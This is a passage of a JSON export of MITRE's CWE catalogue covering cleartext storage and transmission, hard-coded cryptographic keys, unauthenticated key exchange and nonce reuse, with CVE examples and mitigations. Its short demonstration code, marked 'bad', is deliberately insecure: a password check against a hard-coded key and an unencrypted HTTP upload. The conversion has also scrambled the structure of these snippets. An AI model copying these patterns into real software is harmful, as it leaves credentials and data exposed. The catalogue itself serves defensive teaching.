Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Plaintext Storage in Memory","attr":{"@_Date":"2013-07-17"}}}},"317":{"attr":{"@_ID":"317","@_Name":"Cleartext Storage of Sensitive Information in GUI","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application stores sensitive information in cleartext within the GUI.","Extended_Description":"An attacker can often obtain data from a GUI, even if hidden, by using an API to directly access GUI objects such as windows and menus. Even if the information is encoded in a way that is not human-readable, certain techniques could determine which encoding is being used, then decode the information.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"312","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"Windows","@_Prevalence":"Sometimes"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":["Read Memory","Read Application Data"]}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2002-1848","Description":"Unencrypted passwords stored in GUI dialog may allow local users to access the passwords.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1848"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Plaintext Storage in GUI"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"Notes":{"Note":{"#text":"Different people use \\"cleartext\\" and \\"plaintext\\" to mean the same thing: the lack of encryption. However, within cryptography, these have more precise meanings. Plaintext is the information just before it is fed into a cryptographic algorithm, including already-encrypted text. Cleartext is any information that is unencrypted, although it might be in an encoded form that is not easily human-readable (such as base64 encoding).","attr":{"@_Type":"Terminology"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Description, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Applicable_Platforms, Description, Name, Potential_Mitigations, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Plaintext Storage in GUI","attr":{"@_Date":"2013-07-17"}}}},"318":{"attr":{"@_ID":"318","@_Name":"Cleartext Storage of Sensitive Information in Executable","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application stores sensitive information in cleartext in an executable.","Extended_Description":"Attackers can reverse engineer binary code to obtain secret data. This is especially easy when the cleartext is plain ASCII. Even if the information is encoded in a way that is not human-readable, certain techniques could determine which encoding is being used, then decode the information.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"312","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-1794","Description":"Product stores RSA private key in a DLL and uses it to sign a certificate, allowing spoofing of servers and Adversary-in-the-Middle (AITM) attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1794"},{"Reference":"CVE-2001-1527","Description":"administration passwords in cleartext in executable","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1527"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Plaintext Storage in Executable"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"37"}},{"attr":{"@_CAPEC_ID":"65"}}]},"Notes":{"Note":{"#text":"Different people use \\"cleartext\\" and \\"plaintext\\" to mean the same thing: the lack of encryption. However, within cryptography, these have more precise meanings. Plaintext is the information just before it is fed into a cryptographic algorithm, including already-encrypted text. Cleartext is any information that is unencrypted, although it might be in an encoded form that is not easily human-readable (such as base64 encoding).","attr":{"@_Type":"Terminology"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Applicable_Platforms, Description, Name, Potential_Mitigations, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Observed_Examples"}],"Previous_Entry_Name":{"#text":"Plaintext Storage in Executable","attr":{"@_Date":"2013-07-17"}}}},"319":{"attr":{"@_ID":"319","@_Name":"Cleartext Transmission of Sensitive Information","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software transmits sensitive or security-critical data in cleartext in a communication channel that can be sniffed by unauthorized actors.","Extended_Description":"Many communication channels can be \\"sniffed\\" by attackers during data transmission. For example, network traffic can often be sniffed by any attacker who has access to a network interface. This significantly lowers the difficulty of exploitation by attackers.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"311","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"311","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Mobile","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Operation"},{"Phase":"System Configuration"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality"],"Impact":["Read Application Data","Modify Files or Directories"],"Note":"Anyone can read the information by gaining access to the channel being used for communication."}},"Detection_Methods":{"Detection_Method":{"attr":{"@_Detection_Method_ID":"DM-11"},"Method":"Black Box","Description":{"xhtml:p":["Use monitoring tools that examine the software\'s process as it interacts with the operating system and the network. This technique is useful in cases when source code is unavailable, if the software was not developed by you, or if you want to verify that the build phase did not introduce any new weaknesses. Examples include debuggers that directly attach to the running process; system-call tracing utilities such as truss (Solaris) and strace (Linux); system activity monitors such as FileMon, RegMon, Process Monitor, and other Sysinternals utilities (Windows); and sniffers and protocol analyzers that monitor network traffic.","Attach the monitor to the process, trigger the feature that sends the data, and look for the presence or absence of common cryptographic functions in the call tree. Monitor the network and determine if the data packets contain readable commands. Tools exist for detecting if certain encodings are in use. If the traffic contains high entropy, this might indicate the usage of encryption."]}}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Encrypt the data with a reliable encryption scheme before transmitting."},{"Phase":"Implementation","Description":"When using web applications with SSL, use SSL for the entire session from login to logout, not just for the initial login page."},{"Phase":"Testing","Description":"Use tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session. These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules."},{"Phase":"Operation","Description":"Configure servers to use encrypted channels for communication, which may include SSL or other secure protocols."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-42"},"Intro_Text":"The following code attempts to establish a connection to a site to communicate sensitive information.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"try {}catch (IOException e) {}","xhtml:div":[{"#text":"URL u = new URL(\\"http://www.secret.example.org/\\");HttpURLConnection hu = (HttpURLConnection) u.openConnection();hu.setRequestMethod(\\"PUT\\");hu.connect();OutputStream os = hu.getOutputStream();hu.disconnect();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""]},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"//..."}}],"xhtml:br":""}},"Body_Text":"Though a connection is successfully made, the connection is unencrypted and it is possible that all sensitive data sent to or received from the server will be read by unintended actors."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-1949","Description":"Passwords transmitted in cleartext.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1949"},{"Reference":"CVE-2008-4122","Description":"Chain: Use of HTTPS cookie without \\"secure\\" flag causes it to be transmitted across unencrypted HTTP.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4122"},{"Reference":"CVE-2008-3289","Description":"Product sends password hash in cleartext in violation of intended policy.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3289"},{"Reference":"CVE-2008-4390","Description":"Remote management feature sends sensitive information including passwords in cleartext.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4390"},{"Reference":"CVE-2007-5626","Description":"Backup routine sends password in cleartext in email.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5626"},{"Reference":"CVE-2004-1852","Description":"Product transmits Blowfish encryption key in cleartext.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1852"},{"Reference":"CVE-2008-0374","Description":"Printer sends configuration information, including administrative password, in cleartext.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0374"},{"Reference":"CVE-2007-4961","Description":"Chain: cleartext transmission of the MD5 hash of password enables attacks against a server that is susceptible to replay (CWE-294).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4961"},{"Reference":"CVE-2007-4786","Description":"Product sends passwords in cleartext to a log server.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4786"},{"Reference":"CVE-2005-3140","Description":"Product sends file with cleartext passwords in e-mail message intended for diagnostic purposes.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3140"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Plaintext Transmission of Sensitive Information"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"SEC06-J","Entry_Name":"Do not rely on the default automatic signature verification provided by URLClassLoader and java.util.jar"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"SER02-J","Entry_Name":"Sign then seal sensitive objects before sending them outside a trust boundary"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"102"}},{"attr":{"@_CAPEC_ID":"117"}},{"attr":{"@_CAPEC_ID":"383"}},{"attr":{"@_CAPEC_ID":"477"}},{"attr":{"@_CAPEC_ID":"65"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-271"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 9, &#34;Protecting Secret Data&#34; Page 299"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 22: Failing to Protect Network Traffic.&#34; Page 337"}},{"attr":{"@_External_Reference_ID":"REF-172"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Common_Consequences, Description, Likelihood_of_Exploit, Name, Observed_Examples, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Detection_Factors, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Observed_Examples, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Applicable_Platforms, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-01-23","Modification_Comment":"updated Abstraction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Related_Attack_Patterns, Relationships"}],"Previous_Entry_Name":{"#text":"Plaintext Transmission of Sensitive Information","attr":{"@_Date":"2009-01-12"}}}},"321":{"attr":{"@_ID":"321","@_Name":"Use of Hard-coded Cryptographic Key","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The use of a hard-coded cryptographic key significantly increases the possibility that encrypted data may be recovered.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"798","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"798","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"798","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":["Bypass Protection Mechanism","Gain Privileges or Assume Identity"],"Note":"If hard-coded cryptographic keys are used, it is almost certain that malicious users will gain access through the account in question."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Prevention schemes mirror that of hard-coded password storage."}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-92"},"Intro_Text":"The following code examples attempt to verify a password using a hard-coded cryptographic key.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int VerifyAdmin(char *password) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (strcmp(password,\\"68af404b513073584c4b6f22b6c63e6b\\")) {}printf(\\"Entering Diagnostic Mode...\\\\n\\");return(1);","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"printf(\\"Incorrect Password!\\\\n\\");return(0);","xhtml:br":["",""]}},"xhtml:br":["",""]}}}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public boolean VerifyAdmin(String password) {","xhtml:div":{"#text":"if (password.equals(\\"68af404b513073584c4b6f22b6c63e6b\\")) {}System.out.println(\\"Incorrect Password!\\");return false;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"System.out.println(\\"Entering Diagnostic Mode...\\");return true;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},"xhtml:br":["",""]}}},{"attr":{"@_Nature":"bad","@_Language":"C#"},"xhtml:div":{"#text":"int VerifyAdmin(String password) {}","xhtml:div":{"#text":"if (password.Equals(\\"68af404b513073584c4b6f22b6c63e6b\\")) {}Console.WriteLine(\\"Incorrect Password!\\");return(0);","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"Console.WriteLine(\\"Entering Diagnostic Mode...\\");return(1);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},"xhtml:br":["",""]}}}],"Body_Text":"The cryptographic key is within a hard-coded string value that is compared to the password. It is likely that an attacker will be able to read the key and compromise the system."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Use of hard-coded cryptographic key"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A8","Entry_Name":"Insecure Cryptographic Storage","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A9","Entry_Name":"Insecure Communications","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A8","Entry_Name":"Insecure Storage","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP33","Entry_Name":"Hardcoded sensitive data"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Notes":{"Note":{"#text":"The main difference between the use of hard-coded passwords and the use of hard-coded cryptographic keys is the false sense of security that the former conveys. Many people believe that simply hashing a hard-coded password before storage will protect the information from malicious users. However, many hashes are reversible (or at least vulnerable to brute force attacks) -- and further, many authentication protocols simply request the hash itself, making it no better than a password.","attr":{"@_Type":"Other"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}]}},"322":{"attr":{"@_ID":"322","@_Name":"Key Exchange without Entity Authentication","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software performs a key exchange with an actor without verifying the identity of that actor.","Extended_Description":"Performing a key exchange will preserve the integrity of the information sent between two entities, but this will not guarantee that the entities are who they claim they are. This may enable an attacker to impersonate an actor by modifying traffic between the two entities.  Typically, this involves a victim client that contacts a malicious server that is impersonating a trusted server. If the client skips authentication or ignores an authentication failure, the malicious server may request authentication information from the user. The malicious server can then use this authentication information to log in to the trusted server using the victim\'s credentials, sniff traffic between the victim and trusted server, etc.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"923","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"295","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"No authentication takes place in this process, bypassing an assumed protection of encryption."},{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"The encrypted communication between a user and a trusted host may be subject to sniffing by any actor in the communication path."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Ensure that proper authentication is included in the system design."},{"Phase":"Implementation","Description":"Understand and properly implement all checks necessary to ensure the identity of entities involved in encrypted communications."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Many systems have used Diffie-Hellman key exchange without authenticating the entities exchanging keys, allowing attackers to influence communications by redirecting or interfering with the communication path.  Many people using SSL/TLS skip the authentication (often unknowingly)."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Key exchange without entity authentication"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 23: Improper Use of PKI, Especially SSL.&#34; Page 347"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 2, &#34;Untrustworthy Credentials&#34;, Page 37"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-10","Modification_Comment":"clarified the description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Description, References, Relationships"}]}},"323":{"attr":{"@_ID":"323","@_Name":"Reusing a Nonce, Key Pair in Encryption","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Nonces should be used for the present occasion and only once.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"344","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":"Nonces are often bundled with a key in a communication exchange to produce a new session key for each exchange."},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":["Bypass Protection Mechanism","Gain Privileges or Assume Identity"],"Note":"Potentially a replay attack, in which an attacker could send the same data twice, could be crafted if nonces are allowed to be reused. This could allow a user to send a message which masquerades as a valid message from a valid user."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Refuse to reuse nonce values."},{"Phase":"Implementation","Description":"Use techniques such as requiring incrementing, time based and/or challenge response to assure uniqueness of nonces."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"This code takes a password, concatenates it with a nonce, then encrypts it before sending over a 